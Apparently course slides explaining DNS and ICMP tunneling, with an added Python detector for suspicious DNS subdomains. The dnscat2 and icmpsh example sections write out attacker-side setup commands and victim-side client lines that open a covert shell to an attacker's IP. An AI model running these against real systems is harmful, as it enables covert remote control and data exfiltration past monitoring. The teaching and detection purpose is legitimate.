2. Tunneling
Tunneling is a method of cyber attack that sends and receives malicious data over a
legitimate protocol such as DNS, ICMP, SSH, HTTP or HTTPS, making the data look innocent.
The malicious code is wrapped in one of these protocols, and the use of legitimate ports
makes the activity harder to monitor and detect.
3. DNS Tunneling
DNS tunneling is a method of cyber attack that encodes the data of other programs or
protocols in DNS queries and responses. DNS tunneling often includes data payloads that
can be added to an attacked DNS server and used to control a remote server and
applications.
With this technique the payload is harder to detect and can evade IDS/IPS (intrusion
detection system / intrusion prevention system), because the traffic is hidden in the DNS
protocol, which looks legitimate to monitoring systems.
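From the monitoring side, data encoded in DNS queries shows up in resolver logs as many long, high-entropy subdomains under a single parent domain. The Python sketch below is an added example, not part of the original slides; the thresholds, the constructed sample log and the function names are assumptions.

```python
import hashlib
import math
from collections import Counter, defaultdict

def shannon_entropy(s):
    """Bits per character; encoded payloads score higher than hostnames."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def parent_domain(qname):
    # Assumption: the last two labels are the registered domain.
    # Use a public-suffix list for real traffic.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def flag_tunnel_domains(queries, min_unique=5, min_avg_len=30, min_avg_entropy=3.0):
    """Group query names by parent domain and flag parents whose subdomains
    are numerous, long and high-entropy (thresholds are illustrative)."""
    subs = defaultdict(set)
    for _client, qname in queries:
        name = qname.rstrip(".").lower()
        parent = parent_domain(name)
        sub = name[: -len(parent)].rstrip(".")
        if sub:
            subs[parent].add(sub.replace(".", ""))
    flagged = {}
    for parent, names in subs.items():
        avg_len = sum(map(len, names)) / len(names)
        avg_ent = sum(map(shannon_entropy, names)) / len(names)
        if len(names) >= min_unique and avg_len >= min_avg_len and avg_ent >= min_avg_entropy:
            flagged[parent] = {"unique": len(names), "avg_len": avg_len,
                               "avg_entropy": round(avg_ent, 2)}
    return flagged

# Constructed sample log of (client IP, query name); not captured traffic.
# Hex labels stand in for encoded payload chunks; .example is a reserved TLD.
SAMPLE_QUERIES = [("10.0.0.5", f"{h}.corp.example") for h in
                  ("www", "mail", "api", "vpn", "intranet", "files")]
SAMPLE_QUERIES += [("10.0.0.9", hashlib.sha256(b"chunk%d" % i).hexdigest()[:48] + ".tunnel.example")
                   for i in range(8)]

if __name__ == "__main__":
    for domain, stats in flag_tunnel_domains(SAMPLE_QUERIES).items():
        print(domain, stats)
```

The benign parent has six distinct subdomains but is not flagged, because the count alone is not the signal; it is the combination with label length and entropy.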
4. DNS Tunneling - Example
One of the tools for DNS tunneling is dnscat2.
Installing the dnscat2 server on Kali (Attacker):
• # apt-get update
• # apt-get -y install ruby-dev git make g++
• # gem install bundler
• # git clone https://github.com/iagox86/dnscat2.git
• # cd dnscat2/server
• # bundle install
• # ruby ./dnscat2.rb
Windows (Victim) runs the dnscat2 client and connects to the attacker.
• dnscat2-v0.07-client-win32.exe --dns server=(IP of attacker)
5. ICMP Tunneling
An ICMP tunnel is a method of cyber attack that encodes the data of other programs or
protocols in ICMP echo request and reply packets, establishing a covert connection
between two remote computers.
With this technique the payload is harder to detect and can evade IDS/IPS (intrusion
detection system / intrusion prevention system), because the traffic is hidden in the ICMP
protocol, which looks legitimate to monitoring systems.
6. ICMP Tunneling - Example
One of the tools for ICMP tunneling is icmpsh.
Download the icmpsh server on Kali (Attacker):
https://github.com/inquisb/icmpsh
• sysctl -w net.ipv4.icmp_echo_ignore_all=1
• perl icmpsh-m.pl (Ip Attacker) (Ip Victim)
Windows (Victim) runs the icmpsh client and connects to the attacker.
• Icmpsh.exe -t (IP attacker)